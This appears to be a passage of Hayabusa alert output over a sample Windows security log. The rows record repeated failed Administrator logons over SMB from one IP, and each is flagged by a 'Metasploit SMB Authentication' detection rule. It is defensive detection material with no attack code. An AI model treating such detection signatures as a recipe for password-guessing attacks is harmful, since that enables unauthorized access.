19002016-09-20 01:50:24.237 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: SYJheREJmEwj0791 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19012016-09-20 01:50:24.237 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19022016-09-20 01:50:24.277 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: exglD9fnLwaqwRZn : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19032016-09-20 01:50:24.277 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19042016-09-20 01:50:24.325 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 8bSAU1QjasDAsmry : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19052016-09-20 01:50:24.325 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19062016-09-20 01:50:24.363 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: cfnrtXR7evQBbaOw : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19072016-09-20 01:50:24.363 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19082016-09-20 01:50:24.410 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: KYAwjW99chcntPsQ : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19092016-09-20 01:50:24.410 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19102016-09-20 01:50:24.464 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: rG2PYfOTfT7QvbPu : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19112016-09-20 01:50:24.464 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19122016-09-20 01:50:24.508 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: FojDtfDNXq0gQfYu : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19132016-09-20 01:50:24.508 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19142016-09-20 01:50:24.549 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: SUTT0QycbFtyJfNL : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19152016-09-20 01:50:24.549 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19162016-09-20 01:50:24.596 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: gcbv1lrcYdT9Wuli : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19172016-09-20 01:50:24.596 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19182016-09-20 01:50:24.636 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: pjdFfvCCfGXo7FUf : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19192016-09-20 01:50:24.636 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19202016-09-20 01:50:24.697 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: rzqGdWlGglLQx6Z4 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19212016-09-20 01:50:24.697 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19222016-09-20 01:50:24.749 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: V3Rt80PMk70sVqbk : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19232016-09-20 01:50:24.749 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19242016-09-20 01:50:24.795 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: okunzcEHnxUml4SG : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19252016-09-20 01:50:24.795 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19262016-09-20 01:50:24.842 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: qH0AY3DeIryuHSiN : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19272016-09-20 01:50:24.842 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19282016-09-20 01:50:24.886 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: DjqtxY5Fly4qAusS : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19292016-09-20 01:50:24.886 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19302016-09-20 01:50:24.935 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: PXHYu7wAqo7m6mZn : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19312016-09-20 01:50:24.935 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19322016-09-20 01:50:24.990 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: UaEM3boErBRrCbna : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19332016-09-20 01:50:24.990 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19342016-09-20 01:50:25.040 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 7nSzwstH2imPjwah : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19352016-09-20 01:50:25.040 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19362016-09-20 01:50:25.153 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 9Z6NM0I4vRTXlLKu : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19372016-09-20 01:50:25.153 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19382016-09-20 01:50:25.193 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: jYhjN3f8KlFIEUKy : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19392016-09-20 01:50:25.193 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19402016-09-20 01:50:25.232 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: qWicYt2HXLDgc3kc : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19412016-09-20 01:50:25.232 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19422016-09-20 01:50:25.269 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Uz7yqqxdMrsM2L1g : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19432016-09-20 01:50:25.269 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19442016-09-20 01:50:25.308 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: wqKTguT2Z3OPCxGR : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19452016-09-20 01:50:25.308 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19462016-09-20 01:50:25.352 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: ywpwCM4u6nFSq9oS : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19472016-09-20 01:50:25.352 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19482016-09-20 01:50:25.407 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: k1t5ZBw3HOxux65e : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19492016-09-20 01:50:25.407 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19502016-09-20 01:50:25.534 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: MtLFQSltjjOjdl2c : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19512016-09-20 01:50:25.534 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19522016-09-20 01:50:25.593 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: AyFD3cjef0NUMZZ5 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19532016-09-20 01:50:25.593 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19542016-09-20 01:50:25.656 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: uDYECnF1YTKRKA3K : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19552016-09-20 01:50:25.656 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19562016-09-20 01:50:25.700 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: pfqxcIVpX9BbsPIM : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19572016-09-20 01:50:25.700 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19582016-09-20 01:50:25.745 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: mjL5hvyYesMfDISw : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19592016-09-20 01:50:25.745 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19602016-09-20 01:50:25.774 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 3bh8c5ohv55SAX26 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19612016-09-20 01:50:25.774 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19622016-09-20 01:50:25.817 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: MflfcFDnGU3xUOmz : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19632016-09-20 01:50:25.817 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19642016-09-20 01:50:25.859 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: aX0wfTs5FzCdwGrR : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19652016-09-20 01:50:25.859 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19662016-09-20 01:50:25.895 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 9gdU6faDjEH5wW2X : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19672016-09-20 01:50:25.895 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19682016-09-20 01:50:25.929 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 507PC8xD6l0TbhG3 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19692016-09-20 01:50:25.929 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19702016-09-20 01:50:25.973 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: VrWgYcf9EuXt4MHS : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19712016-09-20 01:50:25.973 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19722016-09-20 01:50:26.088 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: GvIGEw3fdX9cDzIV : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19732016-09-20 01:50:26.088 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19742016-09-20 01:50:26.159 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 9X1q0dT5irWa44Rz : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19752016-09-20 01:50:26.159 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19762016-09-20 01:50:26.307 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: ZpgAkElSQjVo53z2 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19772016-09-20 01:50:26.307 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19782016-09-20 01:50:26.410 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 7nxUEwRMaiAhiIXv : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19792016-09-20 01:50:26.410 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19802016-09-20 01:50:26.453 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: vIoaysmFNfEerv8f : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19812016-09-20 01:50:26.453 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19822016-09-20 01:50:26.528 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: aHLhFgL0xfnrAIoF : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19832016-09-20 01:50:26.528 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19842016-09-20 01:50:26.619 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: YGK96B1hDPMK9YKh : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19852016-09-20 01:50:26.619 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19862016-09-20 01:50:26.704 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: yhDnNRDnAwctVtgQ : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19872016-09-20 01:50:26.704 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19882016-09-20 01:50:26.793 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 8zzO7RKaBPpg549A : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19892016-09-20 01:50:26.793 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19902016-09-20 01:50:26.859 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: zDgDGO3IKiLoIQ5D : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19912016-09-20 01:50:26.859 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19922016-09-20 01:50:27.024 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 0aaYeBTUEudC3446 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19932016-09-20 01:50:27.024 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19942016-09-20 01:50:27.093 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: I41H8U06uuGlMf9S : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19952016-09-20 01:50:27.093 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
